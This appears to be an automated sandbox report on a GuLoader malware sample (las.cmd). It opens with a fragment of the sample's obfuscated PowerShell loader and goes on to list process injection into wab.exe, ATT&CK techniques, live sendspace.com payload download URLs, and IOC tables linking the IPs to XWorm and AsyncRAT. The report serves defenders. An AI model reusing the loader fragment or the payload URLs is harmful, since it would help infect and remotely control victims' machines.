usigt');$Unaccidented180+=$Saluterer[1];Unschool ($Unaccidented180);Unschool (Udvindende 'Disle$ski,dB.aphoaRejems De.fiBage c ProchUnshirVip.tod alymcurviiStalaoMichelZon,neWall,.Ko.seHFiskeeU.cita speldDezine N.herSentisTaste[ Pulv$SmagsPStjerr Th riUnderv FanaiTillalP.odue TurbgKonveeTilskdmorfo]Ubety=E hel$ PlanPHoarseEkspod Molli holdcOr
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fettle.Han && echo t"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: AutoIt3_x64.exe.8.dr | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
MITRE ATT&CK matrix, listed by tactic (a leading number is the report's signature count for that technique):

• Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
• Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
• Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
• Execution: 1 Windows Management Instrumentation; 11 Command and Scripting Interpreter; 1 PowerShell; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
• Persistence: 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
• Privilege Escalation: 112 Process Injection; 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
• Defense Evasion: 221 Masquerading; 1 Disable or Modify Tools; 131 Virtualization/Sandbox Evasion; 112 Process Injection; 1 Obfuscated Files or Information; 11 Software Packing; 1 Timestomp; 1 DLL Side-Loading
• Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
• Discovery: 111 Security Software Discovery; 2 Process Discovery; 131 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 File and Directory Discovery; 12 System Information Discovery; Remote System Discovery; System Owner/User Discovery
• Lateral Movement: 1 Taint Shared Content; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
• Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
• Command and Control: 11 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
• Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
• Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
Behavior Graph ID: 1446786, Sample: las.cmd, Start date: 23/05/2024, Architecture: WINDOWS, Score: 100
Domains contacted: www.sendspace.com, fs13n4.sendspace.com, fs03n2.sendspace.com
Sample-level signatures: Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; Yara detected GuLoader; 5 other signatures
Process tree (with per-process signatures, network connections and dropped files):
• cmd.exe: Suspicious powershell command line found; Very long command line found
  • powershell.exe: connects to fs03n2.sendspace.com (69.31.136.17:443, GTT-BACKBONEGTTDE, United States) and www.sendspace.com (172.67.170.105:443, CLOUDFLARENETUS, United States); Suspicious powershell command line found; Very long command line found; Found suspicious powershell code related to unpacking or dynamic code loading
    • powershell.exe: Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; Hides threads from debuggers
      • wab.exe: connects to fs13n4.sendspace.com (69.31.136.57:443, GTT-BACKBONEGTTDE, United States); dropped C:\Windows\svchost.com (PE32), C:\Users\user\AppData\Local\Temp\chrome.exe (PE32), C:\ProgramData\...\VC_redist.x64.exe (PE32) and 149 other malicious files; Creates an undocumented autostart registry key; Hides threads from debuggers; Drops executable to a common third party application directory; Infects executable files (exe, dll, sys, html)
      • cmd.exe
    • conhost.exe
    • cmd.exe
  • conhost.exe

Source | Detection | Scanner
las.cmd | 3% | ReversingLabs
Source | Detection | Scanner
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe | 100% | Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://www.autoitscript.com/autoit3/J | 0% | Avira URL Cloud | safe
https://www.sendspace.com/pro/dl/wlorhsXRwl | 0% | Avira URL Cloud | safe
http://nsis.sf.net/NSIS_ErrorError | 0% | URL Reputation | safe
http://crl.micro | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://fs13n4.sendspace.com/ | 0% | Avira URL Cloud | safe
https://fs13n4.sendspace.com/dlpro/525cc5bd045f79d6fc570e988ce77b0f/664f945a/g1h76h/ZzDmwvhJScPuYqxiGHOFrHH77.bin | 0% | Avira URL Cloud | safe
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
https://www.sendspace.com/pro/dl/wlorhsP | 0% | Avira URL Cloud | safe
https://fs03n2.sendspaX | 0% | Avira URL Cloud | safe
https://www.sendspace.com | 0% | Avira URL Cloud | safe
https://fs03n2.sendspace.com/dlpro/90cd9178b57ca9e755cc53ffd63d0a44/664f9440/wlorhs/Undertaker.pcx | 0% | Avira URL Cloud | safe
https://www.autoitscript.com/autoit3/ | 0% | Avira URL Cloud | safe
http://www.autoitscript.com/autoit3/ | 0% | Avira URL Cloud | safe
http://www.sendspace.com | 0% | Avira URL Cloud | safe
http://fs03n2.sendspace.com | 0% | Avira URL Cloud | safe
http://www.autoitscript.com/autoit3/8 | 0% | Avira URL Cloud | safe
https://www.sendspace.com/ | 0% | Avira URL Cloud | safe
https://www.sendspace.com/pro/dl/g1h76hMU | 0% | Avira URL Cloud | safe
https://aka.ms/pscore6lBfq | 0% | Avira URL Cloud | safe
https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith | 0% | Avira URL Cloud | safe
https://fs03n2.sendspace.com | 0% | Avira URL Cloud | safe
https://www.sendspace.com/pro/dl/wlorhs | 0% | Avira URL Cloud | safe
https://fs13n4.sendspace.com/dlpro/525cc5bd045f79d6fc570e988ce77b0f/664f945a/g1h76h/ZzDmwvhJScPuYqxi | 0% | Avira URL Cloud | safe
https://www.autoitscript.com/site/autoit/8 | 0% | Avira URL Cloud | safe
https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff | 0% | Avira URL Cloud | safe
https://www.sendspace.com/pro/dl/g1h76h | 0% | Avira URL Cloud | safe
https://fs13n4.sendspace.com/ace.com/dlpro/525cc5bd045f79d6fc570e988ce77b0f/664f945a/g1h76h/ZzDmwvhJ | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
fs03n2.sendspace.com | 69.31.136.17 | true | false | | unknown
fs13n4.sendspace.com | 69.31.136.57 | true | false | | unknown
www.sendspace.com | 172.67.170.105 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://fs03n2.sendspace.com/dlpro/90cd9178b57ca9e755cc53ffd63d0a44/664f9440/wlorhs/Undertaker.pcx | false | Avira URL Cloud: safe | unknown
https://fs13n4.sendspace.com/dlpro/525cc5bd045f79d6fc570e988ce77b0f/664f945a/g1h76h/ZzDmwvhJScPuYqxiGHOFrHH77.bin | false | Avira URL Cloud: safe | unknown
https://www.sendspace.com/pro/dl/wlorhs | false | Avira URL Cloud: safe | unknown
https://www.sendspace.com/pro/dl/g1h76h | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.autoitscript.com/autoit3/J | AutoIt3_x64.exe.8.dr | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.2169302600.000001E2C4BB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1989436125.000000000612E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000005.00000002.1984224760.000000000521B000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
https://www.sendspace.com/pro/dl/wlorhsXRwl | powershell.exe, 00000005.00000002.1984224760.000000000521B000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000005.00000002.1984224760.000000000521B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://go.micro | powershell.exe, 00000002.00000002.2059336952.000001E2B5DDF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000005.00000002.1989436125.000000000612E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://fs13n4.sendspace.com/ | wab.exe, 00000008.00000002.2375969322.00000000062EC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1946722033.00000000062F2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1934006716.00000000062F2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1946764965.00000000062F6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000005.00000002.1989436125.000000000612E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.sendspace.com/pro/dl/wlorhsP | powershell.exe, 00000002.00000002.2059336952.000001E2B4D6D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nsis.sf.net/NSIS_ErrorError | wab.exe, 00000008.00000002.2390087315.0000000021CF0000.00000004.00000010.00020000.00000000.sdmp, Uninstall.exe.8.dr | false | URL Reputation: safe | unknown
http://www.autoitscript.com/autoit3/ | Au3Info_x64.exe.8.dr | false | Avira URL Cloud: safe | unknown
https://fs03n2.sendspaX | powershell.exe, 00000002.00000002.2059336952.000001E2B691B000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.autoitscript.com/autoit3/ | AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.dr | false | Avira URL Cloud: safe | unknown
http://www.sendspace.com | powershell.exe, 00000002.00000002.2059336952.000001E2B68F6000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000005.00000002.1984224760.000000000521B000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.sendspace.com | powershell.exe, 00000002.00000002.2059336952.000001E2B4D6D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2059336952.000001E2B6426000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.sendspace.com/ | wab.exe, 00000008.00000002.2375969322.0000000006288000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://fs03n2.sendspace.com | powershell.exe, 00000002.00000002.2059336952.000001E2B692E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith | notification_click_helper.exe.8.dr, elevation_service.exe.8.dr, pwahelper.exe.8.dr | false | Avira URL Cloud: safe | unknown
http://crl.micro | powershell.exe, 00000005.00000002.1992900389.0000000007948000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore6lBfq | powershell.exe, 00000005.00000002.1984224760.00000000050C1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000005.00000002.1989436125.000000000612E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2169302600.000001E2C4BB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1989436125.000000000612E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://fs03n2.sendspace.com | powershell.exe, 00000002.00000002.2059336952.000001E2B691B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2059336952.000001E2B4FD4000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.sendspace.com/pro/dl/g1h76hMU | wab.exe, 00000008.00000002.2375969322.00000000062C2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.autoitscript.com/autoit3/8 | Au3Info_x64.exe.8.dr | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.2059336952.000001E2B4B41000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.2059336952.000001E2B4B41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1984224760.00000000050C1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://fs13n4.sendspace.com/ace.com/dlpro/525cc5bd045f79d6fc570e988ce77b0f/664f945a/g1h76h/ZzDmwvhJ | wab.exe, 00000008.00000003.1934006716.00000000062F2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://fs13n4.sendspace.com/dlpro/525cc5bd045f79d6fc570e988ce77b0f/664f945a/g1h76h/ZzDmwvhJScPuYqxi | wab.exe, 00000008.00000003.1934006716.00000000062F2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.2375969322.00000000062E2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1946764965.00000000062F6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.autoitscript.com/site/autoit/8 | AutoIt3Help.exe.8.dr | false | Avira URL Cloud: safe | unknown
https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff | notification_click_helper.exe.8.dr, elevation_service.exe.8.dr, pwahelper.exe.8.dr | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
69.31.136.17 | fs03n2.sendspace.com | United States | 3257 | GTT-BACKBONEGTTDE | false
172.67.170.105 | www.sendspace.com | United States | 13335 | CLOUDFLARENETUS | false
69.31.136.57 | fs13n4.sendspace.com | United States | 3257 | GTT-BACKBONEGTTDE | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1446786
Start date and time: 2024-05-23 21:07:56 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 48s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: las.cmd
Detection: MAL
Classification: mal100.spre.troj.evad.winCMD@14/164@3/3
EGA Information: Failed
                    HCA Information:
                    • Successful, ratio: 61%
                    • Number of executed functions: 31
                    • Number of non-executed functions: 28
                    Cookbook Comments:
                    • Found application associated with file extension: .cmd
                    • Stop behavior analysis, all processes terminated
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target powershell.exe, PID 7596 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 7844 because it is empty
                    • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtOpenFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: las.cmd
Time | Type | Description
15:08:46 | API Interceptor | 327x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
69.31.136.17 | zap.cmd | malicious | GuLoader, XWorm
 | xff.cmd | malicious | AsyncRAT, GuLoader
 | new.cmd | malicious | GuLoader
 | las.cmd | malicious | GuLoader
 | zap.cmd | malicious | GuLoader, XWorm
 | kam.cmd | malicious | GuLoader
 | upload.vbs | malicious | GuLoader, XWorm
 | update.vbs | malicious | GuLoader, XWorm
 | file.vbs | malicious | GuLoader
 | windows.vbs | malicious | AsyncRAT, GuLoader
172.67.170.105 | zap.cmd | malicious | GuLoader, XWorm
 | new.cmd | malicious | GuLoader
 | las.cmd | malicious | GuLoader
 | kam.cmd | malicious | GuLoader
 | xff.cmd | malicious | AsyncRAT, GuLoader
 | las.cmd | malicious | GuLoader, XWorm
 | windows.vbs | malicious | GuLoader, XWorm
 | file.vbs | malicious | GuLoader, XWorm
 | time.vbs | malicious | GuLoader
 | file300un.exe | malicious | Glupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar
69.31.136.57 | zap.cmd | malicious | GuLoader, XWorm
 | xff.cmd | malicious | AsyncRAT, GuLoader
 | new.cmd | malicious | GuLoader
 | xff.cmd | malicious | AsyncRAT, GuLoader
 | las.cmd | malicious | GuLoader, XWorm
 | las.cmd | malicious | GuLoader
 | kam.cmd | malicious | GuLoader
 | windows.vbs | malicious | GuLoader, XWorm
 | file.vbs | malicious | GuLoader, XWorm
 | update.vbs | malicious | GuLoader
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.sendspace.com | zap.cmd | malicious | GuLoader, XWorm | 172.67.170.105
 | xff.cmd | malicious | AsyncRAT, GuLoader | 104.21.28.80
 | new.cmd | malicious | GuLoader | 172.67.170.105
 | las.cmd | malicious | GuLoader | 172.67.170.105
 | kam.cmd | malicious | GuLoader | 172.67.170.105
 | zap.cmd | malicious | GuLoader, XWorm | 104.21.28.80
 | xff.cmd | malicious | AsyncRAT, GuLoader | 172.67.170.105
 | las.cmd | malicious | GuLoader, XWorm | 172.67.170.105
 | las.cmd | malicious | GuLoader | 104.21.28.80
 | kam.cmd | malicious | GuLoader | 104.21.28.80
fs03n2.sendspace.com | update.vbs | malicious | GuLoader | 69.31.136.17
 | DOCUMENTS.exe.html | malicious | Unknown | 69.31.136.17
 | JAN_YDHM007390.vbs | malicious | Unknown | 69.31.136.17
fs13n4.sendspace.com | las.cmd | malicious | GuLoader, XWorm | 69.31.136.57
 | las.cmd | malicious | GuLoader | 69.31.136.57
 | time.vbs | malicious | GuLoader | 69.31.136.57
 | QA6433_#002.vbs | malicious | njRat | 69.31.136.57
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | zap.cmd | malicious | GuLoader, XWorm | 172.67.170.105
 | https://u44668105.ct.sendgrid.net/ls/click?upn=u001.BTMESiTo6NsF48uIW4-2BrJkEc2YVFzyAaMWnWwgGT9cZqZS45ZZqu4Y-2FXJmZd8BXA8cja_AHV3UK6XjfrXMiZ9J4igW-2FDEUbICycoJ744IkX0PR6FoPBD5ixGfLkyQ9ofRFx1gjy-2BP-2BDUWqu7bhyffh6xflqZsbtNZtMLnpgQoCGrYBrKDAQCrs-2BXh7tVhTtmxcULJOM-2BKcO31hWTdcLyh6xHaFmrsv6JFsx6tjkxHhVyYzmDL2WjDZWPIbWyOCKFNxt29pnc1D6Wos9by2AU7AhdVB3KlHpWThOWm6-2FAP-2Buqng4Vq-2BmwndZ6wQGKVc-2FG51viAW-2FpPzuJOGK4hC-2FF-2FfgyonvDWvDkNa4J3BejflmN-2BuGCUZSHoW4H7oETlKRzn4f7VwMbU0WFOF9ZUfOI6CISxhvZQTsnMYzitMow1nPeu-2Flg0-2FzAaZA27HnZ5WdxtR2wKofgxyBDPpPjMUDCXBmEfEWtT8NXGmNaNpBvJDLI13EkOwRxoG67u0CqbvxxYYK-2F5eu2B-2Bg9JTJRxFbICA7lEJgDZLYhBS-2BbGjIrrRDvHg0hAvMhBJ54TVAoWNvYZYG-2FCqbCuzJrUBI0DoaRAGLq44smm73hnjeG06IT3WQV3A8KkhlXB3fqBFue-2Fd4ydFypfr1PkBzxIk-2FPd1H2pJdMYF-2B7HONDoFax8K-2BBkvfgdiIY-3D | malicious | Unknown | 104.17.3.184
 | xff.cmd | malicious | AsyncRAT, GuLoader | 104.21.28.80
 | new.cmd | malicious | GuLoader | 172.67.170.105
 | las.cmd | malicious | GuLoader | 172.67.170.105
 | kam.cmd | malicious | GuLoader | 172.67.170.105
 | zap.cmd | malicious | GuLoader, XWorm | 104.21.28.80
 | http://hxjmm.check-tl-ver-154-2.com | malicious | Unknown | 104.21.46.101
 | xff.cmd | malicious | AsyncRAT, GuLoader | 172.67.170.105
 | las.cmd | malicious | GuLoader, XWorm | 172.67.170.105
